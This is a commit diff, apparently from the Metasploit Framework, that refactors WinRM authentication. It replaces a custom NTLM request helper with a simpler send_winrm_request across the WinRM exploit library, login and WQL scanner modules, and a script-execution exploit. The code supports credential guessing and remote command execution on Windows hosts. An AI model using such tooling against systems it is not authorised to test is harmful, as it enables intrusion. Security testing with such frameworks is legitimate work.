Attempting to cleanup winrm auth

David Maloney · David Maloney · commit 44d4e298dcca · 2013-02-04T15:48:31.000-06:00
diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb
@@ -42,7 +42,7 @@ def winrm_poke(timeout = 20)
 		c = connect(opts)
 		to = opts[:timeout] || timeout
 		ctype = "application/soap+xml;charset=UTF-8"
-		resp, c = send_request_cgi(opts.merge({
+		resp, c = send_winrm_request(opts.merge({
 			'uri' => opts['uri'],
 			'method' => 'POST',
 			'ctype'     => ctype,
@@ -61,7 +61,7 @@ def parse_auth_methods(resp)
 	end
 
 	def winrm_run_cmd(cmd, timeout=20)
-		resp,c = send_request_ntlm(winrm_open_shell_msg,timeout)
+		resp = send_winrm_request(winrm_open_shell_msg,timeout)
 		if resp.nil?
 			print_error "Recieved no reply from server"
 			return nil
@@ -76,17 +76,17 @@ def winrm_run_cmd(cmd, timeout=20)
 			return retval
 		end
 		shell_id = winrm_get_shell_id(resp)
-		resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout)
+		resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout)
 		cmd_id = winrm_get_cmd_id(resp)
-		resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout)
+		resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout)
 		streams = winrm_get_cmd_streams(resp)
-		resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout)
-		resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id))
+		resp = send_winrm_request(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout)
+		resp = send_winrm_request(winrm_delete_shell_msg(shell_id))
 		return streams
 	end
 
 	def winrm_run_cmd_hanging(cmd, timeout=20)
-		resp,c = send_request_ntlm(winrm_open_shell_msg,timeout)
+		resp = send_winrm_request(winrm_open_shell_msg,timeout)
 		if resp.nil?
 			print_error "Recieved no reply from server"
 			return nil
@@ -101,9 +101,9 @@ def winrm_run_cmd_hanging(cmd, timeout=20)
 			return retval
 		end
 		shell_id = winrm_get_shell_id(resp)
-		resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout)
+		resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout)
 		cmd_id = winrm_get_cmd_id(resp)
-		resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout)
+		resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout)
 		streams = winrm_get_cmd_streams(resp)
 		return streams
 	end
@@ -219,94 +219,6 @@ def generate_uuid
 		::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16))
 	end
 
-	def send_request_ntlm(data, timeout = 20)
-		opts = {
-			'uri' => datastore['URI'],
-			'data' => data,
-			'username' => datastore['USERNAME'],
-			'password' => datastore['PASSWORD']
-		}
-		ntlm_options = {
-				:signing    => false,
-				:usentlm2_session   => datastore['NTLM::UseNTLM2_session'],
-				:use_ntlmv2     => datastore['NTLM::UseNTLMv2'],
-				:send_lm    => datastore['NTLM::SendLM'],
-				:send_ntlm    => datastore['NTLM::SendNTLM']
-				}
-		ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options)
-		workstation_name =  Rex::Text.rand_text_alpha(rand(8)+1)
-		domain_name = datastore['DOMAIN']
-		ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name,
-			workstation_name,
-			ntlmssp_flags))
-		to = opts[:timeout] || timeout
-		begin
-			c = connect(opts)
-			ctype = "application/soap+xml;charset=UTF-8"
-			# First request to get the challenge
-			r = c.request_cgi(opts.merge({
-				'uri' => opts['uri'],
-				'method' => 'POST',
-				'ctype'     => ctype,
-				'headers' => { 'Authorization' => ntlm_message_1},
-				'data'        => opts['data']
-				}))
-			resp = c.send_recv(r, to)
-			unless resp.kind_of? Rex::Proto::Http::Response
-				return [nil,nil]
-			end
-			return [nil,nil] if resp.code == 404
-			return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate']
-			# Get the challenge and craft the response
-			ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1]
-			return [nil,nil] unless ntlm_challenge
-
-			#old and simplier method but not compatible with windows 7/2008r2
-			#ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge)
-			#ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true})
-			ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge)
-			blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2)
-			challenge_key = blob_data[:challenge_key]
-			server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error
-			#netbios name
-			default_name =  blob_data[:default_name] || ''
-			#netbios domain
-			default_domain = blob_data[:default_domain] || ''
-			#dns name
-			dns_host_name =  blob_data[:dns_host_name] || ''
-			#dns domain
-			dns_domain_name =  blob_data[:dns_domain_name] || ''
-			#Client time
-			chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || ''
-			spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name =>  self.rhost}
-			resp_lm,
-			resp_ntlm,
-			client_challenge,
-			ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key,
-				domain_name, default_name, default_domain,
-				dns_host_name, dns_domain_name, chall_MsvAvTimestamp,
-				spnopt, ntlm_options)
-			ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'],
-				resp_lm, resp_ntlm, '', ntlmssp_flags)
-			ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3)
-			# Send the response
-			r = c.request_cgi(opts.merge({
-				'uri' => opts['uri'],
-				'method' => 'POST',
-				'ctype'     => ctype,
-				'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"},
-				'data'        => opts['data']
-				}))
-			resp = c.send_recv(r, to, true)
-			unless resp.kind_of? Rex::Proto::Http::Response
-				return [nil,nil]
-			end
-			return [nil,nil] if resp.code == 404
-			return [resp,c]
-		rescue ::Errno::EPIPE, ::Timeout::Error
-		end
-	end
-
 	def accepts_ntlm_auth
 		parse_auth_methods(winrm_poke).include? "Negotiate"
 	end
@@ -329,6 +241,18 @@ def wmi_namespace
 		return "/root/cimv2/"
 	end
 
+	def send_winrm_request(data, timeout=20)
+		opts = {
+			'uri' => datastore['URI'],
+			'method' => 'POST',
+			'data' => data,
+			'username' => datastore['USERNAME'],
+			'password' => datastore['PASSWORD'],
+			'ctype' => "application/soap+xml;charset=UTF-8"
+		}
+		send_request_cgi(opts,timeout)
+	end
+
 
 	private
 
diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb
@@ -44,7 +44,7 @@ def run_host(ip)
 			return
 		end
 		each_user_pass do |user, pass|
-			resp,c = send_request_ntlm(test_request)
+			resp = send_winrm_request(test_request)
 			if resp.nil?
 				print_error "#{ip}:#{rport}:  Got no reply from the server, connection may have timed out"
 				return
diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb
@@ -47,7 +47,7 @@ def run_host(ip)
 			return
 		end
 
-		resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL']))
+		resp = send_winrm_request(winrm_wql_msg(datastore['WQL']))
 		if resp.nil?
 			print_error "Got no reply from the server"
 			return
diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb
@@ -66,20 +66,8 @@ def initialize(info = {})
 		@compat_mode = false
 	end
 
-	def check
-		unless accepts_ntlm_auth
-			print_error "The Remote WinRM server does not appear to allow Negotiate (NTLM) auth"
-			return Msf::Exploit::CheckCode::Safe
-		end
-
-		return Msf::Exploit::CheckCode::Vulnerable
-	end
-
-
 	def exploit
-		unless  check == Msf::Exploit::CheckCode::Vulnerable
-			return
-		end
+
 		unless valid_login?
 			print_error "Login Failure. Recheck your credentials"
 			return
@@ -141,7 +129,7 @@ def encoded_psh(script)
 
 	def temp_dir
 		print_status "Grabbing %TEMP%"
-		resp,c = send_request_ntlm(winrm_open_shell_msg)
+		resp = send_winrm_request(winrm_open_shell_msg)
 		if resp.nil?
 			print_error "Got no reply from the server"
 			return nil
@@ -152,16 +140,16 @@ def temp_dir
 		end
 		shell_id = winrm_get_shell_id(resp)
 		cmd = "echo %TEMP%"
-		resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id))
+		resp= send_winrm_request(winrm_cmd_msg(cmd, shell_id))
 		cmd_id = winrm_get_cmd_id(resp)
-		resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id))
+		resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id))
 		streams = winrm_get_cmd_streams(resp)
 		return streams['stdout'].chomp
 	end
 
 	def check_remote_arch
 		wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"}
-		resp,c = send_request_ntlm(winrm_wql_msg(wql))
+		resp = send_winrm_request(winrm_wql_msg(wql))
 		#Default to x86 if we can't be sure
 		return "x86" if resp.nil? or resp.code != 200
 		resp_tbl = parse_wql_response(resp)
@@ -247,7 +235,7 @@ def powershell2?
 
 	def valid_login?
 		data = winrm_wql_msg("Select Name,Status from Win32_Service")
-		resp,c = send_request_ntlm(data)
+		resp = send_winrm_request(data)
 		unless resp.code == 200
 			return false
 		end
